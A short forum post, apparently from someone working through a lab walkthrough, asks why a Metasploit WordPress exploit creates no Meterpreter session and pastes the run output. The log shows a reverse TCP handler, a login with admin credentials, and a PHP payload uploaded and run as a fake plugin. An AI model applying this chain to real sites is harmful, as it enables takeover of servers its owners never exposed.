I tried to follow the walktrought but msf gives me an error(?): “exploit completed, but no session was created”. I cant get the meterpreter shell. I’ve searched for a solution but I cant find anyone that works… resinstalled msf ecc. Maybe someone had the same issue?
here is the output on run
[] Started reverse TCP handler on ip:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/JuAjfvxNwq/wSfnCTZMPf.php…
[!] This exploit may require manual cleanup of ‘wSfnCTZMPf.php’ on the target
[!] This exploit may require manual cleanup of ‘JuAjfvxNwq.php’ on the target
[!] This exploit may require manual cleanup of ‘…/JuAjfvxNwq’ on the target
[] Exploit completed, but no session was created.